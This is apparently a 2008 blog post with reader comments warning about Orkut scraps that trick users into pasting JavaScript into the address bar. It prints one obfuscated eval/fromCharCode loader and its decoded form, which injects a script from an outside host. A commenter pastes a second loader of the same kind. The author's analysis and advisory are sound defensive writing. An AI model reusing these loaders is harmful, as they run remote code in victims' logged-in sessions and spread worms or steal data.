Orkut Scripts
Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”
The latest is a pretty interesting one…
javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))
The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts it into their corresponding ASCII characters.
A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):
d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)
This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script at the site, I get the message: This site has been disabled for violations of our Program Policies. .
A quick google search for the script file name yielded that the script simply floods your friends scrapbooks with the same message. Apparently harmless. The key word is apparently.
Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.
I still don’t get it why people jump on scripts like this, when the orkut home page advertises (or at least used to) not to run any script when logged onto orkut. So, I’ll put out a simple security advisory.
Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.
January 31st, 2008 at 11:00 am
Cool, I tried that script and at once I saw in the status bar that it tried to download script from the specific site. I realized that Some thing going wrong and tried to directly access the script,, I found google has already blocked the site. I am not sure the page is actaully displayed by google.
Just googled for the site to see the cache, nothing was there and finally came to this blog.. is that scripts steals the cookies? any how I have changes teh passwords at once.
Also I need you to check this script if it is malcious.
javascript:d=document;c=d.createElement(’script’);d.body.appendChild(c);c.src=’http://cpraveen.com/orkut.js’;void(0)
if u reply to this message, please mail me to intimate it coz just came to your site in a rush and may not come again.
Thanks,
Praveen Kumar C
January 31st, 2008 at 12:59 pm
Came here searching for the meaning of this script. Good the script is already deleted by the time I executed this script. I don’t sense anything really Harmful in this, but what if it was !!
February 1st, 2008 at 10:50 am
i am luck too
that i used this script after it was disabled
i never try scripts but it was sent by one of the most reliable pal
February 2nd, 2008 at 2:31 am
thank yaar